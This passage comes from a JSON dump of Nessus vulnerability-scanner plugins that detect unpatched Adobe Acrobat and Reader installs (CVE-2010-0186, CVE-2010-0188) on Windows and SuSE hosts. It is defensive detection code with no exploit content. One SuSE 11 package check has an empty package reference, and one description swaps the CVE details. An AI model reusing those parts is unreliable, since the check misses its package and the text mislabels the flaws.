script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe Acrobat < 9.3.1 / 8.2.1 Multiple Vulnerabilities (APSB10-07)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote host is earlier\nthan 9.3.1 / 8.2.1. Such versions are reportedly affected by multiple\nvulnerabilities :\n\n - An issue that could subvert the domain sandbox and make\n unauthorized cross-domain requests. (CVE-2010-0186)\n\n - An unspecified vulnerability could cause the application\n to crash or possibly lead to arbitrary code execution.\n (CVE-2010-0188)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-07.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat 9.3.1 / 8.2.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-0188\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Acrobat Bundled LibTIFF Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/02/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Acrobat/Version\");\n\n exit(0);\n}\n\n\ninclude('global_settings.inc');\n\nversion = get_kb_item('SMB/Acrobat/Version');\nif (isnull(version)) exit(1, \"The 'SMB/Acrobat/Version' KB item is missing.\");\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n ver[0] < 8 ||\n (ver[0] == 8 && ver[1] < 2) ||\n (ver[0] == 8 && ver[1] == 2 && ver[2] < 1) ||\n (ver[0] == 9 && ver[1] < 3) ||\n (ver[0] == 9 && ver[1] == 3 && ver[2] < 1)\n)\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n\n version_ui = get_kb_item('SMB/Acrobat/Version_UI');\n\n if (report_verbosity > 0 && version_ui)\n {\n path = get_kb_item('SMB/Acrobat/Path');\n if (isnull(path)) path = 'n/a';\n\n report =\n '\\n'+\n ' Product : Adobe Acrobat\\n'+\n ' Path : '+path+'\\n'+\n ' Installed version : '+version_ui+'\\n'+\n ' Fixed version : 9.3.1 / 8.2.1\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse exit(0, \"The host is not affected since Adobe Acrobat \"+version+\" is installed.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:46:04", "description": "This update of acroread fixes :\n\n - Cross-domain request vulnerability. (CVE-2010-0186 :\n CVSS v2 Base Score: 5.8)\n\n - An unspecified vulnerability that possibly allowed remote code execution. (CVE-2010-0188 : CVSS v2 Base Score: 6.8)", "cvss3": {}, "published": "2010-03-04T00:00:00", "type": "nessus", "title": "SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 2065)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread", "p-cpe:/a:novell:suse_linux:11:acroread-cmaps", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_cn", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_tw", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_ACROREAD-100225.NASL", "href": "https://www.tenable.com/plugins/nessus/44984", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44984);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2010-0186\", \"CVE-2010-0188\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 2065)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SuSE 11 host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update of acroread fixes :\n\n - Cross-domain request vulnerability. (CVE-2010-0186 :\n CVSS v2 Base Score: 5.8)\n\n - An unspecified vulnerability that possibly allowed\n remote code execution. (CVE-2010-0188 : CVSS v2 Base\n Score: 6.8)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=580470\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2010-0186.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2010-0188.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply SAT patch number 2065.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Acrobat Bundled LibTIFF Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-cmaps-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-ja-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-ko-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-zh_TW-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-cmaps-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-ja-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-ko-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-zh_CN-9.3.1-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-zh_TW-9.3.1-0.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:46:02", "description": "This update of acroread fixes :\n\n - CVE-2010-0186: CVSS v2 Base Score: 5.8 Cross-domain request vulnerability\n\n - CVE-2010-0188: CVSS v2 Base Score: 6.8 An unspecified vulnerability that possibly allowed remote code execution.", "cvss3": {}, "published": "2010-03-04T00:00:00", "type": "nessus", "title": "openSUSE Security Update : acroread (acroread-2068)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:acroread", "p-cpe:/a:novell:opensuse:acroread-cmaps", "p-cpe:/a:novell:opensuse:acroread-fonts-ja", "p-cpe:/a:novell:opensuse:acroread-fonts-ko", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_cn", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_tw", "cpe:/o:novell:opensuse:11.1"], "id": "SUSE_11_1_ACROREAD-100225.NASL", "href": "https://www.tenable.com/plugins/nessus/44978", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-2068.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44978);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2010-0186\", \"CVE-2010-0188\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-2068)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update of acroread fixes :\n\n - CVE-2010-0186: CVSS v2 Base Score: 5.8 Cross-domain\n request vulnerability\n\n - CVE-2010-0188: CVSS v2 Base Score: 6.8 An unspecified\n vulnerability that possibly allowed remote code\n execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=580470\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected acroread packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Acrobat Bundled LibTIFF Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-9.3.1-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-cmaps-9.3.1-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-ja-9.3.1-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-ko-9.3.1-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-zh_CN-9.3.1-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-zh_TW-9.3.1-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:45:48", "description": "This update of acroread fixes :\n\n - CVE-2010-0186: CVSS v2 Base Score: 5.8 Cross-domain request vulnerability\n\n - CVE-2010-0188: CVSS v2 Base Score: 6.8 An unspecified vulnerability that possibly allowed remote code execution.", "cvss3": {}, "published": "2010-03-04T00:00:00", "type": "nessus", "title": "openSUSE Security Update : acroread (acroread-2068)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:acroread", "p-cpe:/a:novell:opensuse:acroread-cmaps", "p-cpe:/a:novell:opensuse:acroread-fonts-ja", "p-cpe:/a:novell:opensuse:acroread-fonts-ko", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_cn", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_tw", "cpe:/o:novell:opensuse:11.0"], "id": "SUSE_11_0_ACROREAD-100225.NASL", "href": "https://www.tenable.com/plugins/nessus/44975", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-2068.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44975);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2010-0186\", \"CVE-2010-0188\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-2068)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update of acroread fixes :\n\n - CVE-2010-0186: CVSS v2 Base Score: 5.8 Cross-domain\n request vulnerability\n\n - CVE-2010-0188: CVSS v2 Base Score: 6.8 An unspecified\n vulnerability that possibly allowed remote code\n execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=580470\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected acroread packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Acrobat Bundled LibTIFF Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-9.3.1-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-cmaps-9.3.1-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-fonts-ja-9.3.1-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-fonts-ko-9.3.1-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-fonts-zh_CN-9.3.1-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-fonts-zh_TW-9.3.1-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:45:07", "description": "The version of Adobe Reader installed on the remote host is earlier than 9.3.1 / 8.2.1. As such, it is reportedly affected by multiple vulnerabilities :\n\n - An issue that could subvert the domain sandbox and make unauthorized cross-domain requests. (CVE-2010-0186)\n\n - An unspecified vulnerability could cause the application to crash or possibly lead to arbitrary code execution.\n (CVE-2010-0188)", "cvss3": {}, "published": "2010-02-17T00:00:00", "type": "nessus", "title": "Adobe Reader < 9.3.1 / 8.2.1 Multiple Vulnerabilities (APSB10-07)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSB10-07.NASL", "href": "https://www.tenable.com/plugins/nessus/44644", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44644);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2010-0186\", \"CVE-2010-0188\");\n script_bugtraq_id(38195, 38198);\n script_xref(name:\"Secunia\", value:\"38551\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe Reader < 9.3.1 / 8.2.1 Multiple Vulnerabilities (APSB10-07)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote host is earlier\nthan 9.3.1 / 8.2.1. As such, it is reportedly affected by multiple\nvulnerabilities :\n\n - An issue that could subvert the domain sandbox and make\n unauthorized cross-domain requests. (CVE-2010-0186)\n\n - An unspecified vulnerability could cause the application\n to crash or possibly lead to arbitrary code execution.\n (CVE-2010-0188)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-07.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader 9.3.1 / 8.2.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-0188\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Acrobat Bundled LibTIFF Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/02/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_reader_installed.nasl\");\n script_require_keys(\"SMB/Acroread/Version\");\n\n exit(0);\n}\n\n#\n\ninclude('global_settings.inc');\n\ninfo = NULL;\nvers = get_kb_list('SMB/Acroread/Version');\nif (isnull(vers)) exit(0, 'The \"SMB/Acroread/Version\" KB item is missing.');\n\nforeach version (vers)\n{\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n if (\n ver[0] < 8 ||\n (ver[0] == 8 && ver[1] < 2) ||\n (ver[0] == 8 && ver[1] == 2 && ver[2] < 1) ||\n (ver[0] == 9 && ver[1] < 3) ||\n (ver[0] == 9 && ver[1] == 3 && ver[2] < 1)\n )\n {\n path = get_kb_item('SMB/Acroread/'+version+'/Path');\n if (isnull(path)) exit(1, 'The \"SMB/Acroread/'+version+'/Path\" KB item is missing.');\n\n verui = get_kb_item('SMB/Acroread/'+version+'/Version_UI');\n if (isnull(verui)) exit(1, 'The \"SMB/Acroread/'+version+'/Version_UI\" KB item is missing.');\n\n info += ' - ' + verui + ', under ' + path + '\\n';\n }\n}\n\nif (isnull(info)) exit(0, 'The remote host is not affected.');\n\nif (report_verbosity > 0)\n{\n if (max_index(split(info)) > 1) s = \"s of Adobe Reader are\";\n else s = \" of Adobe Reader is\";\n\n report =\n '\\nThe following vulnerable instance'+s+' installed on the'+\n '\\nremote host :\\n\\n'+\n info;\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n}\nelse security_hole(get_kb_item(\"SMB/transport\"));\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:45", "description": "This update of acroread fixes :\n\n - Cross-domain request vulnerability CVE-2010-0188: CVSS v2 Base Score: 6.8 An unspecified vulnerability that possibly allowed remote code execution. (CVE-2010-0186:\n CVSS v2 Base Score: 5.8)", "cvss3": {}, "published": "2011-01-27T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 6881)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_ACROREAD-6881.NASL", "href": "https://www.tenable.com/plugins/nessus/51698", "sourceData": "#%NASL_MIN_LEVEL 